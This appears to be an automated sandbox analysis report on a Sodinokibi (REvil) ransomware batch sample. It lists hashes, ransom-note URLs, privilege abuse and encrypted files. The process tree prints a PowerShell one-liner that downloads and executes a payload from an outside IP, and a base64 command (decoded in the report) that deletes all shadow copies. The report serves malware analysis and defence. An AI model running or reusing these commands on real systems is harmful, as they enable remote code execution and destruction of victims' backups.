Analysis
max time kernel: 136s
max time network: 56s
platform: windows7_x64
resource: win7v200430
submitted: 03-06-2020 23:10
Static task: static1
Behavioral task: behavioral1
  Sample: 837314d5a05e52f9e0f09a5a473497d3.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 837314d5a05e52f9e0f09a5a473497d3.bat
  Resource: win10v200430
General
Target: 837314d5a05e52f9e0f09a5a473497d3.bat
Size: 219B
MD5: e87a8c6ada089d0fc3473fb4ba1558c2
SHA1: dd36ca2fa4407f895a6261a1cfee402482ed0bc9
SHA256: 26044d6010566eb7dd69bf7aa8595f0aa4b739d18418526591bd1bf544f91b4a
SHA512: 254f838fba727d5a1fc5a71a60182b9b940e0fcb93a0797e335ee99e46d4a8ea2d7a613f7ee72a567146a7d13ff2bc20f8187eb199bd336969eedfed6403ed4c
Malware Config
Extracted from: http://185.103.242.78/pastes/837314d5a05e52f9e0f09a5a473497d3
Extracted from: C:\88a3w9hls4-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/99CC83E05C635FBD
    http://decryptor.cc/99CC83E05C635FBD
Signatures
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid   process
  364   powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description                      pid   process
  Token: SeDebugPrivilege          364   powershell.exe
  Token: SeDebugPrivilege          364   powershell.exe
  Token: SeDebugPrivilege          1900  powershell.exe
  Token: SeBackupPrivilege         1616  vssvc.exe
  Token: SeRestorePrivilege        1616  vssvc.exe
  Token: SeAuditPrivilege          1616  vssvc.exe
  Token: SeTakeOwnershipPrivilege  364   powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes:
  pid   process
  364   powershell.exe
  1900  powershell.exe
  (all 77 process-enumeration events come from these two powershell.exe instances; the per-event rows are identical and are not repeated here)
Enumerates connected drives (3 TTPs)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  description      ioc                                                                                                                                                            process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\l77lgdo6tb5n0.bmp"  powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  description                      pid   process         target process
  PID 1032 wrote to memory of 364  1032  cmd.exe         powershell.exe
  PID 364 wrote to memory of 1900  364   powershell.exe  powershell.exe
  PID 364 wrote to memory of 1900  364   powershell.exe  powershell.exe
  PID 364 wrote to memory of 1900  364   powershell.exe  powershell.exe
  PID 364 wrote to memory of 1900  364   powershell.exe  powershell.exe
Blacklisted process makes network request (1 IoC)
Processes:
  flow  pid  process
  3     364  powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes:
  description  ioc                                                                                        process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                   vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                 vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                        vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer   vssvc.exe
Drops file in Program Files directory (34 IoCs)
Processes:
  description                   ioc                                                                                    process
  File opened for modification  \??\c:\program files\AddUpdate.wav                                                     powershell.exe
  File opened for modification  \??\c:\program files\ConvertFromJoin.doc                                               powershell.exe
  File opened for modification  \??\c:\program files\GetEnable.temp                                                    powershell.exe
  File opened for modification  \??\c:\program files\RevokePop.3gpp                                                    powershell.exe
  File opened for modification  \??\c:\program files\StartPublish.dotm                                                 powershell.exe
  File opened for modification  \??\c:\program files\UpdateEnter.rle                                                   powershell.exe
  File opened for modification  \??\c:\program files\LimitUninstall.vbs                                                powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\88a3w9hls4-readme.txt         powershell.exe
  File opened for modification  \??\c:\program files\PingComplete.xlsb                                                 powershell.exe
  File opened for modification  \??\c:\program files\ConvertRequest.midi                                               powershell.exe
  File opened for modification  \??\c:\program files\ExportProtect.ppsm                                                powershell.exe
  File opened for modification  \??\c:\program files\NewAdd.vsdx                                                       powershell.exe
  File opened for modification  \??\c:\program files\RevokeShow.clr                                                    powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\88a3w9hls4-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\DebugRename.xps                                                   powershell.exe
  File opened for modification  \??\c:\program files\ResolveDisconnect.js                                              powershell.exe
  File opened for modification  \??\c:\program files\SaveConvertFrom.au3                                               powershell.exe
  File opened for modification  \??\c:\program files\StepShow.ppt                                                      powershell.exe
  File opened for modification  \??\c:\program files\ApprovePublish.mpeg3                                              powershell.exe
  File opened for modification  \??\c:\program files\SendMount.xls                                                     powershell.exe
  File created                  \??\c:\program files (x86)\88a3w9hls4-readme.txt                                       powershell.exe
  File opened for modification  \??\c:\program files\PublishTest.shtml                                                 powershell.exe
  File opened for modification  \??\c:\program files\RenameSwitch.ram                                                  powershell.exe
  File created                  \??\c:\program files\88a3w9hls4-readme.txt                                             powershell.exe
  File opened for modification  \??\c:\program files\ConnectLimit.wma                                                  powershell.exe
  File opened for modification  \??\c:\program files\InitializeInvoke.wvx                                              powershell.exe
  File opened for modification  \??\c:\program files\OptimizeStart.mid                                                 powershell.exe
  File opened for modification  \??\c:\program files\ShowConvertTo.zip                                                 powershell.exe
  File opened for modification  \??\c:\program files\TracePublish.gif                                                  powershell.exe
  File opened for modification  \??\c:\program files\UnblockLock.xlt                                                   powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\88a3w9hls4-readme.txt    powershell.exe
  File opened for modification  \??\c:\program files\RestoreGroup.raw                                                  powershell.exe
  File opened for modification  \??\c:\program files\ResumeProtect.doc                                                 powershell.exe
  File opened for modification  \??\c:\program files\UnprotectUnblock.vssx                                             powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID 1032)
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\837314d5a05e52f9e0f09a5a473497d3.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 364)
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/837314d5a05e52f9e0f09a5a473497d3');Invoke-VPQRVSXXHIUV;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1900)
      command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is a base64-encoded UTF-16LE script; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , which accounts for the vssvc.exe activity and the Shadow Copy writer keys listed under "Modifies service")
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\vssvc.exe (PID 1616)
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service